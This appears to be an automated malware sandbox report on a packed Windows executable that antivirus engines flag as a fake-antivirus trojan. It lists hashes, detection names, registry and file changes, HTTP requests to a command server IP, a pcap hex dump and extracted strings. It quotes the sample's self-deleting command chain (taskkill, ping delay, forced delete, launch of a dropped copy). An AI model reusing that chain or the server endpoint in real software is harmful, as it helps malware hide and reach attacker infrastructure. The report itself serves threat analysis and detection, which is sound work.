Analysis Date: 2015-05-07 08:01:19
MD5: 00492b6b07181e907ee1e69915553938
SHA1: 4f80199671d77689dd493fc5a23dda711b84781b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text — md5: 3819c44ed5b46fc1138bf79c67cdf621 sha1: 8a34a551c6f9c0536bece4164d7a421550a9f332 size: 177664
Section .rdata — md5: 26fd84be46c5a152064258d40da25cd5 sha1: cfad28aba1d4e80ed2b03ae431c3ef06a427ed2f size: 1536
Section .data — md5: d80c20c285ceb0d3ce05a9657026d717 sha1: dd5e41e182d05905af573a058dd30f0e6a533af7 size: 68608
Section .rsrc — md5: 89f70ca28cc49222e0b2a278e4a4deef sha1: e0f7c5c3d879513101a3d4b587d9b887733d19d7 size: 12288
Timestamp: 2005-07-26 00:19:22
PEhash: da984ba82a490241f169cac2809417acd69ba63a
IMPhash: 4757145cf643f820b62a7588ba412b5f
AV Ad-Aware: Gen:Variant.Kazy.5193
AV Alwil (avast): MalOb-EY [Cryp]
AV Arcabit (arcavir): Gen:Variant.Kazy.5193
AV Authentium: W32/FakeAlert.JH.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV BitDefender: Gen:Variant.Kazy.5193
AV BullGuard: Gen:Variant.Kazy.5193
AV CA (E-Trust Ino): Win32/FakeSpypro.B!generic
AV CAT (quickheal): FraudTool.Security
AV ClamAV: no_virus
AV Dr. Web: Trojan.Fakealert.19447
AV Emsisoft: Gen:Variant.Kazy.5193
AV Eset (nod32): Win32/Kryptik.CA
AV Fortinet: W32/FakeAV.PACK!tr
AV Frisk (f-prot): W32/FakeAlert.JH.gen!Eldorado
AV F-Secure: Gen:Variant.Kazy.5193
AV Grisoft (avg): Cryptic.BSC
AV Ikarus: Packer.Win32.Krap
AV K7: Trojan ( 001cdda01 )
AV Kaspersky: Packed.Win32.Krap.ic
AV MalwareBytes: Rogue.SecureShield
AV Mcafee: FakeAlert-AVPSec.l
AV Microsoft Security Essentials: Rogue:Win32/Winwebsec
AV MicroWorld (escan): Gen:Variant.Kazy.5193
AV Padvish: no_virus
AV Rising: no_virus
AV Sophos: Mal/FakeAV-DO
AV Symantec: Trojan.Gen
AV Trend Micro: TROJ_FAKEAV.BMC
AV Twister: Trojan.558BEC81EC3C01000.mg
AV VirusBlokAda (vba32): BScope.Trojan.FakeAV.1707

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: PIPE\wkssvc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\12386.exe
Creates Process: "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /pid 1364 & ping -n 3 127.1 & del /f /q "C:\malware.exe" & start C:\Documents and Settings\Administrator\Local Settings\Application Data\12386.exe -f
Creates Mutex: i'm here
Creates Mutex: DBWinMutex

Process
↳ "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /pid 1364 & ping -n 3 127.1 & del /f /q "C:\malware.exe" & start C:\Documents and Settings\Administrator\Local Settings\Application Data\12386.exe -f

Creates Process: ping -n 3 127.1
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Application Data\12386.exe -f
Creates Process: taskkill /f /pid 1364

Process
↳ taskkill /f /pid 1364

Creates File: PIPE\lsarpc

Process
↳ ping -n 3 127.1

Winsock DNS: 127.1

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Application Data\12386.exe -f

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: i'm here
Winsock DNS: 216.38.2.151

Network Details:

HTTP GET: http://216.38.2.151/cb_soft.php?q=707ae34c06a99dc85bca26bb2bbef34e
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
HTTP GET: http://216.38.2.151/cb_soft.php?q=707ae34c06a99dc85bca26bb2bbef34e
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 216.38.2.151:80
Flows TCP: 192.168.1.1:1031 ➝ 216.38.2.151:80
Flows TCP: 192.168.1.1:1032 ➝ 216.38.2.151:80

Raw Pcap
0x00000000 (00000)   47455420 2f63625f 736f6674 2e706870   GET /cb_soft.php
0x00000010 (00016)   3f713d37 30376165 33346330 36613939   ?q=707ae34c06a99
0x00000020 (00032)   64633835 62636132 36626232 62626566   dc85bca26bb2bbef
0x00000030 (00048)   33346520 48545450 2f312e31 0d0a5573   34e HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000050 (00080)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000060 (00096)   653b204d 53494520 352e353b 2057696e   e; MSIE 5.5; Win
0x00000070 (00112)   646f7773 204e5420 352e3029 0d0a486f   dows NT 5.0)..Ho
0x00000080 (00128)   73743a20 3231362e 33382e32 2e313531   st: 216.38.2.151
0x00000090 (00144)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000a0 (00160)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f63625f 736f6674 2e706870   GET /cb_soft.php
0x00000010 (00016)   3f713d37 30376165 33346330 36613939   ?q=707ae34c06a99
0x00000020 (00032)   64633835 62636132 36626232 62626566   dc85bca26bb2bbef
0x00000030 (00048)   33346520 48545450 2f312e31 0d0a5573   34e HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000050 (00080)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000060 (00096)   653b204d 53494520 352e353b 2057696e   e; MSIE 5.5; Win
0x00000070 (00112)   646f7773 204e5420 352e3029 0d0a486f   dows NT 5.0)..Ho
0x00000080 (00128)   73743a20 3231362e 33382e32 2e313531   st: 216.38.2.151
0x00000090 (00144)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000a0 (00160)   206e6f2d 63616368 650d0a0d 0a          no-cache....


Strings
o
 
5
.3>.
I
P
b.
.ks...
.
....
$`@\
aCE#
071H8Tp
0P}.$$
\ 0q'5
0-VUUW
^1jSpF
1|V)piMs
2N7N<r
3<7M!B
;;\3MpA
:^3WK;	S`
4hData
4hDire
4hryTo
4We6	-
[)[5:H
5*M7F]hL
_5Tz.~$
64$e['
6H-]iV
|6wU4Qh
78;}=8
>7< l	
7O8Q>i
82QuPD
8}A/)mV3s
8m\x1-
8NJO}.
||8V$l
8xTQR-
.9?|0X
9EVy.UF
_9iLik
9_~\	]j
9Yli[a
a"@##.
ANF~,X
b"9U9b
**?b B
Bf28D_
BqW*U B
bsJSFK
C0[/;R
.C5$)i
CertCloseStore
CertCompareIntegerBlob
CertDuplicateCertificateContext
CertEnumCertificatesInStore
CertFindCertificateInStore
CertGetCertificateContextProperty
CFGMGR32.dll
CloseHandle
CM_Get_Depth_Ex
CoCreateGuid
CoInitialize
CoUninitialize
CreateThread
CRYPT32.dll
CryptHashCertificate
CryptHashPublicKeyInfo
CryptSignAndEncodeCertificate
CvcvN0
@.data
DeleteCriticalSection
;D=	;<o
d|Zu.p	(8
'%%E9\pI~
\+E"lO
EnterCriticalSection
)eTu}g
,E)We0KPJ
F)9LYd
Fhky@"m
FU((KO
+F`[Y?:
g;8U?Tx-g
GetCommandLineA
GetCurrentDirectoryW
GetCurrentProcess
GetCurrentThreadId
GetLastError
GetModuleHandleA
GetModuleHandleW
GetVersionExA
Gi <Ig
+@Hk#-
hLibrh
hLoadhd&
HqOoJ]x
hSleeh
hVirth
]?Hx6N
hX)Z$l
hz:zQa
i2l0h7C
-]I:6D
;(i94Tp
InitializeCriticalSection
I*_StZ
&#|Iu:q
}!j''{|
j4_h@>
J4hLocah
?Jo8EP
Jr"c@j.
+JRxzC
!jsv^jte
kdpw4m
KERNEL32.dll
kIzP3-
;}Kqr7
LeaveCriticalSection
L.]^LY
ln.J `
LoadStringA
LoadStringW
[LqT|M
lstrcmpiA
lstrlenA
?{m0{5
M"4l78
Mj(HPTa
M/R,mZ
MultiByteToWideChar
n2",;-
;N[>]GO
{Ni8|W7
N^jB$^
n*J^|H
|NKU&,Y
+|n	pr
N./R<<
>N/TmU
Nuy>Y]
{O0+M+-
o1\%@G
O6z>6/
ole32.dll
or%>3.j
O+rUt85{
OTx<3)
oyok/7I
(O{ZsV
?P1zWw
p>3N99Q
{PbulS
PI]* @
PPh20*
PQKN8f
PRX5mWR
?PyQ*k
q]8z$$
Q,Ed&|H
& qJzO
^q[PkA
Q.~)s[
Q"xEKOD
Q?YR**M
`.rdata
ResetEvent
)Rh(-Qi
\:Rich?
)rM3_)
rmx%'B
r^]no;
r~Uri<0"
r+x`>5
ry25lW
S4Qw'h
s?[b<C
SetCurrentDirectoryA
SetErrorMode
SetEvent
SetPriorityClass
SetThreadPriority
SHGetThreadRef
SHLWAPI.dll
SI0	jP+
^sLVr-
SoEMC@
sP5o#[
SSndLi
@su8Gp
SVM]pf
sWxTv*
T5wm?E
;T:	;D
TerminateProcess
TerminateThread
!This program cannot be run in DOS mode.
T,J4j@
T.wz,'
TZmx}F
;u0bnF
u0<C?[
U.J'Eg
>}uL<z
	;UQoG
USER32.dll
"UUUVg
UUYL+8
Uxo;zU
V14xcB
v^7_}8`+
|VON*y
VUQue}
WaitForSingleObject
$wA/R/<
wc'vlj
WideCharToMultiByte
\WW(1rB
WwNPx+PvjYV3
X-0rWI!c
Xv:	_A
-Xw^tz
??Y=^0|
~y]jNA
y_.Kw1-
yNCRYi^
zW/&Q)+5
-zYr~$